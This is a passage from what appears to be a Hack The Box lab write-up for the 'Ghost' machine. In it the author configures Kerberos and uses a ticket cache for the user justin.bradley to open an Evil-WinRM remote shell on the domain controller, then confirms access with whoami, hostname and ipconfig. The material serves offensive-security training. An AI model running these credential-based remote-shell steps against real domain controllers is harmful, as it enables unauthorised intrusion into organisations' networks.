WinRM
Now that I have validated the credential of the justin.bradley user, I can PSRemote directly to the dc01.ghost.htb host as the user is part of the Remote Management Users group according to ldapdomaindump and BloodHound
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ echo -e '[realms]\n\n\tGHOST.HTB = {\n\t\tkdc = dc01.ghost.htb\n\t}' | sudo tee /etc/krb5.conf
[realms]
GHOST.HTB = {
kdc = dc01.ghost.htb
}
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=justin.bradley@dc01.ghost.htb.ccache evil-winrm -i dc01.ghost.htb -r GHOST.HTB
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\justin.bradley\Documents> whoami
ghost\justin.bradley
*Evil-WinRM* PS C:\Users\justin.bradley\Documents> hostname
DC01
*Evil-WinRM* PS C:\Users\justin.bradley\Documents> ipconfig
Windows IP Configuration
Ethernet adapter vEthernet (internal):
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.0.0.254
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.24
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2Initial Foothold established to the dc01.ghost.htb host as the justin.bradley user via WinRM